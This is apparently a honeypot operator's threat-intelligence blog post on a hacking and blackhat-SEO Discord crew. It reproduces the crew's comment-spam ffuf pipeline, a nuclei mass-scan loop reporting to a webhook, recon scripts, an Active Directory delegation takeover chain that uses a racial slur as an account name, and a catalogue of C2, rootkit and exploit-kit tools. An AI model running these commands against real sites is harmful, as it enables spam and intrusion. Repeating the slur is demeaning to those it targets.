Ukrainian Honeypot ::009:: Crew ::001:: chakal1337 // “Skidson Mafia” // Hacking/Blackhat SEO Discord Servers

Ukrainian Honeypot ::009:: Crew ::001:: chakal1337 // “Skidson Mafia” // Hacking/Blackhat SEO Discord Servers

Last Updated

Mon Oct 9 18:54:14 2023

See Also

(all are still regularly updated as of roughly the above date; I apologize for any organizational issues and the raw nature of this data, there’s a lot to manage and a lot coming in while still trying to analyze manually to a certain degree while monitoring services; I also have a disorganized mess of a mind)


stream = [('in', b'POST /wp-comments-post.php HTTP/1.1\x0d\x0aHost: ##bcable-redacted##\x0d\x0aUser-Agent: Mozilla/5.0 +(##redacted-user##)\x0d\x0aReferer: https://##redacted-site##/\x0d\x0aConnection: close\x0d\x0aContent-Type: application/x-www-form-urlencoded\x0d\x0aContent-Length: 200\x0d\x0a\x0d\x0acomment=##redacted-user##+https://##redacted-site##/&author=##redacted-user##&'),


I randomly tracked the following redacted log down to a Discord invite, then “socially engineered” my way into the chat. Inside the initial “halt who goes there” access restriction landing channel, there was a bunch of chatting happening between hackers ranging from very skilled to very inexperienced peoplei totalling about 20 people. I ignored most of it, wasn’t really relevant since it was mostly just exchanging racist nonsense. Plenty of interesting code to analyze, though, including the actual code that was used to spam this exact URL to my honeypot:

“[11/16/2022 5:26 AM] Get top1m lists (and example to search for wp-comments-post.php):”

wget -c
cd top-1m.csv
cat top-1m.csv | sed -e "s/.*,//g" > top1m.txt
for i in $(cat top1m.txt); do echo https://$i/ >> top1mhttp.txt; done
cat top1mhttp.txt | head -n 100000 > top100k.txt
ffuf -w top100k.txt -u FUZZ -mc 200 -o workinghttp.txt
cat workinghttp.txt | jq .results[].url | tr -d '"' | sort -u | uniq >top1mworkinghttp.txt
ffuf -u FUZZ/wp-comments-post.php -w top1mworkinghttp.txt -mc 405 -o wp-comments-post.json
cat wp-comments-post.json | jq .results[].url | tr -d '"' >wp-comments-post.txt (edited)

“[11/16/2022 5:27 AM] Screen quick cheatsheet:”

screen -S session_name - create session
CTRL+A CTRL+D - detach
screen -list - list
screen -r session_name - reattach
CTRL+A K y - kill
CTRL+A ESC - scroll mode (q or esc to exit)

“Making backlinks with ffuf”

ffuf -u FUZZ -w wp-comments-post.txt -H "Content-Type: application/x-www-form-urlencoded" -H "Referer:" -d "comment=hello+world&author=hey&" -H "User-Agent: Mozilla/5.0 (Firefox)"

Very interesting to see the script(s) that were used to actually hit my server. I don’t think this “crew” actually did the attack itself, they advertise this code to be used by anyone, essentially. Otherwise there wouldn’t be instructions on how to use something as simple as GNU screen. I’ve heard of similar groups that operate out of mostly Bangladesh but this group mostly spoke Portuguese it seemed.

I’ll reiterate that US intelligence, whether true or not, keeps accusing China of posing as Brazilian hackers. I seem to be finding a lot of “Brazilian hackers” or at least those who fit that profile. Later analysis suggests these people might have been Serbian or Chechen hackers, but it’s very hard to attribute.

Another Project

Here is another project which seems to send a generic JSON webhook to mass targets. Takes things off HackerOne datasets and uses nuclei to attempt to exploit, so things should be acceptable targets.


import json
import requests
import random

url = ""
r = requests.get(url=url)
fullz = []
datas = json.loads(r.text)
for data in datas:
 if not "targets" in data: continue
 for target in data["targets"]["in_scope"]:
  if not target["asset_identifier"].startswith("*."): continue
  if not target["eligible_for_bounty"] == True: continue
  if not target["eligible_for_submission"] == True: continue
  fullz.append(target["asset_identifier"].replace("*.", ""))


getallscope | shuf | head -n 10 | assetfinder -subs-only > tmpfile


rm probed;
rm foundvuln.txt;
rm tmpfile;
cat tmpfile | shuf | httprobe -c 100 | tee -a probed;
nuclei -as -silent -s medium,high,critical -nc -l probed | xargs -L 1 sendwebhook | tee -a foundvuln.txt;

/usr/bin/sendwebhook (change webhook url to yours)

argstr=$(echo $argstr | tr -d '"');
echo $argstr;
curl WEBHOOK_URL_HERE -H "Content-Type: application/json" --data "{\"name\":\"hello\", \"content\":\"$argstr\"}";
sleep 2;


while true; do 

“and finally run this command then exit out of your vps and wait for bugs to pop in your discord channel”

nohup pwnforever &

“remember to chmod +x every script”
“and install assetfinder, nuclei, httprobe”
“(they’re in kali’s repositories just apt install)”

“takes urls from stdin and prints only the ones with unique parameter names”

import sys

urlparamlist = []

def getpath(url):
 if not "://" in url: return ""
 urll = url.split("://")[1]
 urll = "/".join(urll.split("/")[1:])
 if "?" in urll: urll = urll.split("?")[0]
 return urll

def alreadyparam(url):
 global urlparamlist
 paramsfull = ""
 urlparams = url.split("?")
 if len(urlparams) > 1:
  urlparams = urlparams[1]
  urlparams = ""
 paramsfull += getpath(url)
 for urlparam in urlparams.split("&"):
  if not "=" in urlparam: continue
  else: urlparam = urlparam.split("=")[0]
  paramsfull += "{}".format(urlparam)
 if not paramsfull in urlparamlist:
  return 0
  return 1

for url in sys.stdin:
 url = url.strip()
 if not alreadyparam(url):


cat all_urls.txt | python > unique_param.txt

grabipranges (JS)

function grabipranges() {
 full = "";
 var links = document.getElementsByTagName("a");
 for(let i = 0; i < links.length; i++) {
  if(!links[i].href) continue;
  if(links[i].href.indexOf("/prefix/") == -1) continue;
  if(links[i].href.indexOf("::") !== -1) continue;
  full += links[i].href.split("prefix/")[1] + " ";

“little script to grab all ip ranges from”

Auto-Scan Script

if [[ $# < 1 ]]; then
 echo "$0 <domain>";
echo "Checking dependencies...";
if ! which assetfinder &>/dev/null;  then
 sudo apt install assetfinder;
if ! which getallurls &>/dev/null;  then
 sudo apt install getallurls;
if ! which nmap &>/dev/null;  then
 sudo apt install nmap;
if ! which httprobe &>/dev/null;  then
 sudo apt install nmap;
if ! which dirsearch &>/dev/null; then
 sudo apt install dirsearch;
echo "Cleaning up previous scan files...";
rm assetsfound.txt &>/dev/null;
rm all_urls.txt &>/dev/null;
rm nmap-scan.txt &>/dev/null;
rm assetsworking.txt &>/dev/null;
rm dirsearched.txt &>/dev/null;
rm customwordlist.txt &>/dev/null;
echo "Starting..";
echo "Running assetfinder...";
assetfinder -subs-only $1 | tee -a assetsfound.txt;
echo "Cleaning up asset list...";
cat assetsfound.txt | sort -u | uniq > assetsfoundt.txt;
mv assetsfoundt.txt assetsfound.txt;
echo "Probing for working http servers...";
cat assetsfound.txt | httprobe | tee -a assetsworking.txt;
echo "Cleaning working assets list...";
cat assetsworking.txt | sort -u | uniq > assetsworkingt.txt;
mv assetsworkingt.txt assetsworking.txt;
echo "Creating custom wordlist...";
for i in $(cat assetsworking.txt); do curl $i --output - | sed -e "s/\s/\n/g" | tr "[:cntrl:][:punct:]" "\n" | tr -s "[:cntrl:]" "\n" >>customwordlist.txt; done;
echo "Cleaning custom wordlist...";
cat customwordlist.txt | sort -u | uniq > customwordlistt.txt;
mv customwordlistt.txt customwordlist.txt;
echo "Running getallurls...";
for i in $(cat assetsworking.txt); do getallurls $i | tee -a all_urls.txt; done;
echo "Running nmap...";
nmap -sT -Pn -T5 -vv -n -iL assetsfound.txt -oN nmap-scan.txt;
echo "Running dirsearch...";
cp assetsworking.txt /tmp/assetsworking.txt;
dirsearch -l /tmp/assetsworking.txt -o /tmp/dirsearched.txt;
rm /tmp/assetsworking.txt;
mv /tmp/dirsearched.txt dirsearched.txt;
echo "Running dirsearch with the custom wordlist...";
cp assetsworking.txt /tmp/assetsworking.txt;
cp customwordlist.txt /tmp/customwordlist.txt;
dirsearch -l /tmp/assetsworking.txt -o /tmp/dirsearched.txt -w /tmp/customwordlist.txt;
rm /tmp/assetsworking.txt;
rm /tmp/customwordlist.txt;
mv /tmp/dirsearched.txt dirsearched_customlist.txt;
echo "All done!";

import sys

urlparamlist = []

def getpath(url):
 if not "://" in url: return ""
 urll = url.split("://")[1]
 urll = "/".join(urll.split("/")[1:])
 if "?" in urll: urll = urll.split("?")[0]
 return urll

def getbase(url):
 schema = url.split("://")[0]
 url = url.split("://")[1]
 if "/" in url: url = url.split("/")[0]
 fullurl = "{}://{}/".format(schema, url)
 return fullurl

def alreadyparam(url):
 global urlparamlist
 paramsfull = ""
 urlparams = url.split("?")
 if len(urlparams) > 1:
  urlparams = urlparams[1]
  urlparams = ""
 paramsfull += getpath(url)+"?"
 for urlparam in urlparams.split("&"):
  if not "=" in urlparam: continue
  else: urlparam = urlparam.split("=")[0]
  paramsfull += "{}={}&".format(urlparam, sys.argv[1])
 paramsfull = "&".join(paramsfull.split("&")[:-1])
 if not paramsfull in urlparamlist:
  return 0
  return 1

for url in sys.stdin:
 url = url.strip()

“generate custom wordlist from cewl output”

cat cewld.txt | python3 > generated.txt
import sys

words = []

for line in sys.stdin:

def mk(lower=False):
 for word in words:
  for word2 in words:
   if word == word2: continue
   if lower == True:
    word = word.lower()
    word2 = word2.lower()
   print("{}{}".format(word, word2))
   print("{}-{}".format(word, word2))
   print("{}.{}".format(word, word2))
   print("{}_{}".format(word, word2))

words = list(set(words))

Other Logs Provided

These I believe are logs of their CTF challenge successes.

Nmap scan report for
Host is up, received user-set (0.093s latency).
Scanned at 2022-10-31 15:18:34 EDT for 61s
Not shown: 989 filtered tcp ports (no-response)
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-10-31 19:18:49Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 0s
| p2p-conficker:
|   Checking for Conficker.C or higher...
|   Check 1 (port 46499/tcp): CLEAN (Timeout)
|   Check 2 (port 19493/tcp): CLEAN (Timeout)
|   Check 3 (port 45724/udp): CLEAN (Timeout)
|   Check 4 (port 55678/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2022-10-31T19:18:57
|_  start_date: N/A

88/tcp open  kerberos-sec
| krb5-enum-users:
| Discovered Kerberos principals
|     guest@support.htb
|_    administrator@support.htb

SMB  445    DC               [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False)
SMB  445    DC               [+] support.htb\guest:
SMB  445    DC               [+] Enumerated shares
SMB  445    DC               Share           Permissions     Remark
SMB  445    DC               -----           -----------     ------
SMB  445    DC               ADMIN$                          Remote Admin
SMB  445    DC               C$                              Default share
SMB  445    DC               IPC$            READ            Remote IPC
SMB  445    DC               NETLOGON                        Logon server share
SMB  445    DC               support-tools   READ            support staff tools
SMB  445    DC               SYSVOL                          Logon server share


[System Access]
MinimumPasswordAge = 1
MaximumPasswordAge = -1
MinimumPasswordLength = 7
PasswordComplexity = 1
PasswordHistorySize = 24
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ForceLogoffWhenHourExpire = 0
ClearTextPassword = 0
LSAAnonymousNameLookup = 0
[Kerberos Policy]
MaxTicketAge = 10
MaxRenewAge = 7
MaxServiceAge = 600
MaxClockSkew = 5
TicketValidateClient = 1
[Registry Values]

[Registry Values]
[Privilege Rights]
SeAssignPrimaryTokenPrivilege = *S-1-5-20,*S-1-5-19
SeAuditPrivilege = *S-1-5-20,*S-1-5-19
SeBackupPrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeBatchLogonRight = *S-1-5-32-559,*S-1-5-32-551,*S-1-5-32-544
SeChangeNotifyPrivilege = *S-1-5-32-554,*S-1-5-11,*S-1-5-32-544,*S-1-5-20,*S-1-5-19,*S-1-1-0
SeCreatePagefilePrivilege = *S-1-5-32-544
SeDebugPrivilege = *S-1-5-32-544
SeIncreaseBasePriorityPrivilege = *S-1-5-90-0,*S-1-5-32-544
SeIncreaseQuotaPrivilege = *S-1-5-32-544,*S-1-5-20,*S-1-5-19
SeInteractiveLogonRight = *S-1-5-9,*S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-548,*S-1-5-32-551,*S-1-5-32-544
SeLoadDriverPrivilege = *S-1-5-32-550,*S-1-5-32-544
SeMachineAccountPrivilege = *S-1-5-11
SeNetworkLogonRight = *S-1-5-32-554,*S-1-5-9,*S-1-5-11,*S-1-5-32-544,*S-1-1-0
SeProfileSingleProcessPrivilege = *S-1-5-32-544
SeRemoteShutdownPrivilege = *S-1-5-32-549,*S-1-5-32-544
SeRestorePrivilege = *S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSecurityPrivilege = *S-1-5-32-544
SeShutdownPrivilege = *S-1-5-32-550,*S-1-5-32-549,*S-1-5-32-551,*S-1-5-32-544
SeSystemEnvironmentPrivilege = *S-1-5-32-544
SeSystemProfilePrivilege = *S-1-5-80-3139157870-2983391045-3678747466-658725712-1809340420,*S-1-5-32-544
SeSystemTimePrivilege = *S-1-5-32-549,*S-1-5-32-544,*S-1-5-19
SeTakeOwnershipPrivilege = *S-1-5-32-544
SeUndockPrivilege = *S-1-5-32-544
SeEnableDelegationPrivilege = *S-1-5-32-544



evil-winrm -i -u support


New-MachineAccount -MachineAccount "NIGGER" -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

Set-ADComputer "DC" -PrincipalsAllowedToDelegateToAccount "NIGGER$"

.\Rubeus.exe  hash /password:123456 /user:NIGGER$ /domain:support.htb


impacket-getST support.htb/NIGGER$ -spn http/ -aesKey 52BB4083984059E72EEFD69D56412220 -impersonate administrator -dc-ip

export KRB5CCNAME=administrator.ccache

impacket-psexec support.htb/ -k -no-pass


Other Tricks

kali i3

how to get

[img of i3 for kali]

- sudo apt install i3
- sudo update-alternatives --config x-session-manager
- select i3
- reboot

Interesting idea, but for most people kali is best as a LiveCD that can be destroyed, and i3/sway are best with my own config personally. Also, a reboot is not necessary since you can just execute systemctl restart lightdm.

Discord Unicode Usernames

Apparently using the control code \x0a as a username will be accepted by Discord (UPDATE: not true anymore), but make a blank username. This was used by a non-core member of said crew.

Tools List Provided

Web App Tools

dirsearch - best directory busting tool
ffuf - the best http fuzzing tool
httprobe - check alive http servers from a large list
gospider - crawling webservers
assetfinder - passive asset discovery
getallurls - passive url discovery
amass - multi use passive enumeration tool
meg - request many paths in many hosts (like round robin directory busting)
sqlmap - the best sql injection tool
tplmap - like sqlmap but for server side template injection
burpsuite - highly extensible http(s) proxy, includes a lot of useful tools its a must have
nuclei - an actually good automated scanner (like nessus but specialized for web apps and 10x better)
git-dumper - dump exposed .git directories

Online Tools - mess with various data formats and encodings (great tool) - check availability of hosts, tcp and udp ports, ping, geolocation and more - bgp tools - even more bgp tools - service to find passwords from breaches - whois history, reverse whois and other whois tools

Windows Tools

crackmapexec - password spraying and service enumeration for many protocols
impacket-getTGT - get kerberos ticket granting ticket to use with other tools
impacket-smbclient - (better) smb client
impacket-psexec - create and run psexec service
impacket-wmiexec - run commands over wmi
impacket-smbexec - execute commands over smb
DonPAPI - dump credentials from dpapi
evil-winrm - windows remoting
bloodhound - visualize active directory attack paths
responder - respond to and poison various windows protocols to grab authentication
WinPeas - windows privilege escalation tool (like linpeas)
powersploit - windows powershell post exploitation module
rubeus - kerberos multi tool
sysinternals - a suite of tools for windows administration

Network Tools

masscan - fast port scanner (async, single syn packet)
zmap - another fast port scanner (async, single syn packet)
nmap - the best port scanning tool with scripting capabilities and accurate service detection
netcat - easily build tcp or udp connections and quick shells
chisel - create socks, http and udp tunnels over http

Linux Tools:

linpeas - privilege escalation and info gathering script works every time (ok 99% of the time)
linenum - run this if linpeas doesn't give you the sauce
diamorphine - kernel rootkit for process hiding

C2 Tools

powershell-empire - c2/post exploitation framweork with agents written in powershell (for windows) and python (for linux)
cobalt strike - c2 framework with a lot of AD capabilities built in to the agent
Quasar RAT - open source windows "remote administration" tool
AsyncRAT - open source windows "remote administration" tool
mirai/qbot - ddos c2 for linux
perlbot - irc based c2 for linux

Exfiltration Tools

rsync - transfer or synchronize files fast
rclone - upload content to the cloud fast
scp/sftp - upload over ssh tunnel
ftp - upload files over ftp
smbclient - upload files over smb


Google - the most powerful of them all.. - searches a username on countless social media sites and prints matches
maltego - visualize open source data points as a graph and apply transforms to extend them
exiftool - extract exif metadata from files

Password Tools

hashcat - fast hash cracker
john - another fast hash cracker
hydra - fast bruteforcer that supports many protocols - generate wordlist from a folder of files and documents belonging to the target user
cupp - generate common user passwords and mutations from a wordlist or interactive prompt
Exploitation Tools:
metasploit - probably the best exploitation framework ever made
armitage - multiplayer red team with a gui frontend for metasploit (it's open source cobalt strike..)
BlackHole - leaked browser exploit kit
BleedingLife - leaked browser exploit kit
CrimePack - leaked browser exploit kit
searchsploit - searches exploitdb from the command line

SEO/Spam Tools

Scrapebox - scrape links and keywords, emails, pr and much more from search engines, post comments, pingbacks, trackbacks.. swiss army knife of SEO
XRumer - amazing forum spamming tool that's been around for more than a decade and still being actively developed
Xevil - ocr tool that can decode pretty much any captcha in miliseconds, comes with xrumer
allsubmitter - russian multi spam tool
gsa search engine ranker - another good backlink tool
grum - leaked email spam botnet c2
phplist - open source mailing list software
exim - mail transfer agent
postfix - mail transfer agent

Reverse Engineering

x64dbg - great graphical debugger
ollydbg - windows 32 bit graphical debugger
immunitydebugger - a graphical debugger extensible with python
gdb - gnu debugger
pwndbg - pwn extensions for gdb
edb - a graphical debugger for linux
WinDBG - NT OS kernel and userland debugger
IDA - decompiler, debugger and code analysis tool
ghidra - decompiler, debugger and code analysis tool
cheatengine - a tool for developing game hacks that's also really useful for reverse engineering

Binary Exploitation

pwntools - full fledged pwn framework with lots of tools to make exploit development easier
rop-tool - tool for finding rop gadgets
checksec - check which mitigations are enabled on a binary
afl - fast brute force fuzzer with instrumentation
spike - network protocol fuzzer
msfvenom - easily generate shellcode using metasploit framework templates

Message Monitoring

Not a whole lot other than racist and pro-Russian content. One interesting thing I noticed was that the old style “1337-speak” is no longer a thing, and broken english is not really a thing as much either. It was mostly memes and taking on personas. Some people took on the persona of Pokimane (chakal1337), some Serena Williams (not in a good way), others Al Pacino (Scarface), many common influencers were common tactics. This provided for very expressive “reactive” people that were easily memeable and easy to communicate via GIFs. The way I stayed on was adopting an identity of my own, and I will keep that identity to myself.

Eventually a link was posted to which provided a ton of other DNS entries.

Description provided of features:

- Page for search engine
- Redirect humans to location
- Custom title & description
- Multiple high DA domains
- Unlimited traffic
- 1% skim

Samples of Chat:

These are some of the more sanitized chat/meme examples: